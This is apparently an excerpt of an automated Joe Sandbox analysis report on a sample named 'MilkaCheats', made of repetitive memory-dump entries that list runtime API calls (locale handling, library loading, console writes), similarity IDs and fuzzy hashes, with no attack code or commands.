                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                              • API String ID: 4061214504-1276376045
                                                                                              • Opcode ID: 7edf49fc6901b4c72a4416fa57c331966d1ca05e043c102eed9cc343a79a82a4
                                                                                              • Instruction ID: a3d09bddcca893a73cab4c8bf9bcba9eba349f09eb42443163656ac099a41a91
                                                                                              • Opcode Fuzzy Hash: 7edf49fc6901b4c72a4416fa57c331966d1ca05e043c102eed9cc343a79a82a4
                                                                                              • Instruction Fuzzy Hash: 7301A735904659FFDB118F51DC45BAEBBF9FB04B10F000536E911B6290DBB89900CA50
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 000C60E9
                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 000C60F4
                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 000C6162
                                                                                                • Part of subcall function 000C6245: std::locale::_Locimp::_Locimp.LIBCPMT ref: 000C625D
                                                                                              • std::locale::_Setgloballocale.LIBCPMT ref: 000C610F
                                                                                              • _Yarn.LIBCPMT ref: 000C6125
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                              • String ID:
                                                                                              • API String ID: 1088826258-0
                                                                                              • Opcode ID: 76a296686282a0dc2ca9afaeadd0e58226d67b1014b95a4b4235b56bd3043e00
                                                                                              • Instruction ID: 05667004b4c80eaecacb4ae30b6bec9eb559ed08733c33dfacf266f5c4927574
                                                                                              • Opcode Fuzzy Hash: 76a296686282a0dc2ca9afaeadd0e58226d67b1014b95a4b4235b56bd3043e00
                                                                                              • Instruction Fuzzy Hash: A201B179A005149FCB06AB20DC95EBC7BB1FF80741B59004CE81167392CF39AEC2CB80
                                                                                              APIs
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000D73F9
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000D740C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                              • String ID: 7r$7r
                                                                                              • API String ID: 885266447-589201516
                                                                                              • Opcode ID: d5a3bb9ac3b4f6f816ff14475476270a34a09eebdcf5fa823ab6f6a38222b798
                                                                                              • Instruction ID: 0833a60949bf69a5d46b35c7f6e350152e3e9ff2d0792ac2a344141286a42688
                                                                                              • Opcode Fuzzy Hash: d5a3bb9ac3b4f6f816ff14475476270a34a09eebdcf5fa823ab6f6a38222b798
                                                                                              • Instruction Fuzzy Hash: BE514D71A04249EFCF14CF98C891EAEBBB2EF49310F14815AE859A7351E7309E41DB60
                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,000CB193,00000000,00000000,?,?,?,?,000CB2BD,00000002,FlsGetValue,000E5EB8,FlsGetValue), ref: 000CB1EF
                                                                                              • GetLastError.KERNEL32(?,000CB193,00000000,00000000,?,?,?,?,000CB2BD,00000002,FlsGetValue,000E5EB8,FlsGetValue,00000000,?,000CA14D), ref: 000CB1F9
                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000000,000E5EB8,FlsGetValue,00000000,?,000CA14D), ref: 000CB221
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                              • String ID: api-ms-
                                                                                              • API String ID: 3177248105-2084034818
                                                                                              • Opcode ID: dc22215bb793cd8af97598654f675632605e5abcbc80489cebc8a009b1bed406
                                                                                              • Instruction ID: 7657ae6cbfeac96ec015088b36daa7f5f47e1857c9eafb938d137c2fa0eb8839
                                                                                              • Opcode Fuzzy Hash: dc22215bb793cd8af97598654f675632605e5abcbc80489cebc8a009b1bed406
                                                                                              • Instruction Fuzzy Hash: 8CE01A30680348BAEB101BA1FC46F6D3A94AB00B54F144134FA0CFC0E1D7759A109685
                                                                                              APIs
                                                                                              • GetConsoleOutputCP.KERNEL32(865EA617,00000000,00000000,00000000), ref: 000D640D
                                                                                                • Part of subcall function 000DAB29: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,000DA50C,?,00000000,-00000008), ref: 000DABD5
                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 000D6668
                                                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 000D66B0
                                                                                              • GetLastError.KERNEL32 ref: 000D6753
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                              • String ID:
                                                                                              • API String ID: 2112829910-0
                                                                                              • Opcode ID: 0f41207a75e24cfb4658691a2adc0712014137ee207092017dc52b49d4a5d6cd
                                                                                              • Instruction ID: 926c308012a9eface8f909e5e9e60954480a20192ef1db20524415bfbe1977b2
                                                                                              • Opcode Fuzzy Hash: 0f41207a75e24cfb4658691a2adc0712014137ee207092017dc52b49d4a5d6cd
                                                                                              • Instruction Fuzzy Hash: 64D17975D042589FCF11CFA8D880AEDBBB5FF49314F18456AE826EB352D731A941CB60
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: AdjustPointer
                                                                                              • String ID:
                                                                                              • API String ID: 1740715915-0
                                                                                              • Opcode ID: 79f345b366643020e140ba6afd39e8fc6b7a799d93faeed1cd1ab9721b1bc3c0
                                                                                              • Instruction ID: 6ee87175bfbde3d39bcb4ac9fba6b3ffd2990bfcec5444998ec6adb1b9f4c3ee
                                                                                              • Opcode Fuzzy Hash: 79f345b366643020e140ba6afd39e8fc6b7a799d93faeed1cd1ab9721b1bc3c0
                                                                                              • Instruction Fuzzy Hash: AC51D372B0461A9FDB298F59D841FBEB3A4FF02318F14452EE90547192E732ED80DB92
                                                                                              APIs
                                                                                                • Part of subcall function 000DAB29: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,000DA50C,?,00000000,-00000008), ref: 000DABD5
                                                                                              • GetLastError.KERNEL32 ref: 000DAFA9
                                                                                              • __dosmaperr.LIBCMT ref: 000DAFB0
                                                                                              • GetLastError.KERNEL32(?,?,?,?), ref: 000DAFEA
                                                                                              • __dosmaperr.LIBCMT ref: 000DAFF1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                              • String ID:
                                                                                              • API String ID: 1913693674-0
                                                                                              • Opcode ID: 878734fe53e11ed1da8ed4c66237def7ffc5a546b82939e5f6732b9b720ead9f
                                                                                              • Instruction ID: 3492c99ddbd08813dceb6224ac94567d19d2ac793ad776ee2c16bfdaf9a075b1
                                                                                              • Opcode Fuzzy Hash: 878734fe53e11ed1da8ed4c66237def7ffc5a546b82939e5f6732b9b720ead9f
                                                                                              • Instruction Fuzzy Hash: B421A771700305AFDB20AFA5C881AAFBBA9FF41364B15852BF82997341D734EC409BB1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 51342a1c92ea84103986883891e0c22e166ac8b53863580de97e0bccf3087dd3
                                                                                              • Instruction ID: 28756900857f8414bd28f212e2df7540aa2a9c04a45fcbfa92ed03cf953c0fcf
                                                                                              • Opcode Fuzzy Hash: 51342a1c92ea84103986883891e0c22e166ac8b53863580de97e0bccf3087dd3
                                                                                              • Instruction Fuzzy Hash: DF216D32200306AFDB60EF69EC81BAAB7A9AF40364F144527F91D97352D730ED408B72
                                                                                              APIs
                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 000DBEFC
                                                                                                • Part of subcall function 000DAB29: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,000DA50C,?,00000000,-00000008), ref: 000DABD5
                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 000DBF34
                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 000DBF54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                              • String ID:
                                                                                              • API String ID: 158306478-0
                                                                                              • Opcode ID: b2908d447417c5de23934fcfe7b21e1212ee1fbef28b6ab5dc6a330c37ea71a5
                                                                                              • Instruction ID: 8cb4759c54d147cc683538b45aa794737a6ba6859ddf57608fe0d40dc7b7f675
                                                                                              • Opcode Fuzzy Hash: b2908d447417c5de23934fcfe7b21e1212ee1fbef28b6ab5dc6a330c37ea71a5
                                                                                              • Instruction Fuzzy Hash: EF11E1B1505705BF6B2167B15CCACAF399CDF853A97120027F80592302EB64CD408971
                                                                                              APIs
                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 000C2043
                                                                                              • int.LIBCPMT ref: 000C2056
                                                                                                • Part of subcall function 000C2B8B: std::_Lockit::_Lockit.LIBCPMT ref: 000C2B9C
                                                                                                • Part of subcall function 000C2B8B: std::_Lockit::~_Lockit.LIBCPMT ref: 000C2BB6
                                                                                              • std::_Facet_Register.LIBCPMT ref: 000C2089
                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 000C209F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                              • String ID:
                                                                                              • API String ID: 459529453-0
                                                                                              • Opcode ID: cacbdc0633d82fd90a362e48d9e1b4478efa89544da73f1aa4c4dc9d5c46971e
                                                                                              • Instruction ID: 368413a8d4b5a14aed4d88860d88de5c5baa9257ea5a8a76f204d1d7f2c22bc9
                                                                                              • Opcode Fuzzy Hash: cacbdc0633d82fd90a362e48d9e1b4478efa89544da73f1aa4c4dc9d5c46971e
                                                                                              • Instruction Fuzzy Hash: 4F01A776900614ABCB15EB64D855FDE77B8DF80760B21414DF906A72A3EF31AE81D780
                                                                                              APIs
                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 000C1ED8
                                                                                              • int.LIBCPMT ref: 000C1EEB
                                                                                                • Part of subcall function 000C2B8B: std::_Lockit::_Lockit.LIBCPMT ref: 000C2B9C
                                                                                                • Part of subcall function 000C2B8B: std::_Lockit::~_Lockit.LIBCPMT ref: 000C2BB6
                                                                                              • std::_Facet_Register.LIBCPMT ref: 000C1F1E
                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 000C1F34
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                              • String ID:
                                                                                              • API String ID: 459529453-0
                                                                                              • Opcode ID: ab6a8170d6fec93dba4b5b7d08a8133eeb0477f59eefc293a365dc206d2d1268
                                                                                              • Instruction ID: 52ef368fd9921c0f72db15e6bfe5a41f73aeefb299c6af86cf0eac4a349320c1
                                                                                              • Opcode Fuzzy Hash: ab6a8170d6fec93dba4b5b7d08a8133eeb0477f59eefc293a365dc206d2d1268
                                                                                              • Instruction Fuzzy Hash: 7801DB76510514ABCB15AB64DC55FDE77A8DF82364B51415CF811A72A3DF30AF42C7C0
                                                                                              APIs
                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 000C1F51
                                                                                              • int.LIBCPMT ref: 000C1F64
                                                                                                • Part of subcall function 000C2B8B: std::_Lockit::_Lockit.LIBCPMT ref: 000C2B9C
                                                                                                • Part of subcall function 000C2B8B: std::_Lockit::~_Lockit.LIBCPMT ref: 000C2BB6
                                                                                              • std::_Facet_Register.LIBCPMT ref: 000C1F97
                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 000C1FAD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                              • String ID:
                                                                                              • API String ID: 459529453-0
                                                                                              • Opcode ID: 02a86ce8fc958251eb98d799d5ba1bf8ebbd2511325b1dc2352d5b0a7d75269e
                                                                                              • Instruction ID: d770544fac17eb7675886b48d27d83f9debf6e57d11a494c70409fe6c69ebdf3
                                                                                              • Opcode Fuzzy Hash: 02a86ce8fc958251eb98d799d5ba1bf8ebbd2511325b1dc2352d5b0a7d75269e
                                                                                              • Instruction Fuzzy Hash: B501F236900514ABCB14AB64C855FEE77A89F81360B61416CF805AB392EB30AE829BC0
                                                                                              APIs
                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 000C1FCA
                                                                                              • int.LIBCPMT ref: 000C1FDD
                                                                                                • Part of subcall function 000C2B8B: std::_Lockit::_Lockit.LIBCPMT ref: 000C2B9C
                                                                                                • Part of subcall function 000C2B8B: std::_Lockit::~_Lockit.LIBCPMT ref: 000C2BB6
                                                                                              • std::_Facet_Register.LIBCPMT ref: 000C2010
                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 000C2026
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                              • String ID:
                                                                                              • API String ID: 459529453-0
                                                                                              • Opcode ID: 947baed0e912d524da8ba966466b7badcb70bac832be8463aec11690f74acc20
                                                                                              • Instruction ID: 6e71f8db4d73fb90455284d18d1c9f2ce7e7297b099d54a23d7326480c378543
                                                                                              • Opcode Fuzzy Hash: 947baed0e912d524da8ba966466b7badcb70bac832be8463aec11690f74acc20
                                                                                              • Instruction Fuzzy Hash: E601A776500514ABCB29AB54D945EDE77A8DF80360B20415EF901A7293DF30EF81C780
                                                                                              APIs
                                                                                              • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,000DEFE9,00000000,00000001,00000000,00000000,?,000D67A7,00000000,00000000,00000000), ref: 000E1FE8
                                                                                              • GetLastError.KERNEL32(?,000DEFE9,00000000,00000001,00000000,00000000,?,000D67A7,00000000,00000000,00000000,00000000,00000000,?,000D6D65,00000000), ref: 000E1FF4
                                                                                                • Part of subcall function 000E1FBA: CloseHandle.KERNEL32(FFFFFFFE,000E2004,?,000DEFE9,00000000,00000001,00000000,00000000,?,000D67A7,00000000,00000000,00000000,00000000,00000000), ref: 000E1FCA
                                                                                              • ___initconout.LIBCMT ref: 000E2004
                                                                                                • Part of subcall function 000E1F7C: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,000E1FAB,000DEFD6,00000000,?,000D67A7,00000000,00000000,00000000,00000000), ref: 000E1F8F
                                                                                              • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,000DEFE9,00000000,00000001,00000000,00000000,?,000D67A7,00000000,00000000,00000000,00000000), ref: 000E2019
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                              • String ID:
                                                                                              • API String ID: 2744216297-0
                                                                                              • Opcode ID: f018bff0aab0de8cd26f4812f50fae75e535475801028f7050f6538da918f643
                                                                                              • Instruction ID: e4f47221e9fa5df83b370973b294b61dc5e915f6fda26f514c606003f4b02811
                                                                                              • Opcode Fuzzy Hash: f018bff0aab0de8cd26f4812f50fae75e535475801028f7050f6538da918f643
                                                                                              • Instruction Fuzzy Hash: DCF0FE36401155BFCF121F92EC08A897E66EB49760B444020FA08A5172C6318CA0DB90
                                                                                              APIs
                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 000C9EDF
                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 000C9F93
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                              • String ID: csm
                                                                                              • API String ID: 3480331319-1018135373
                                                                                              • Opcode ID: 4760746fac3c4e9f1025cd18633cf154bd483382996b60220e1f9b5cc390b365
                                                                                              • Instruction ID: f29d506cc0b69bba429b6664c82de56fffc911181748d871885dcd8ee048a71b
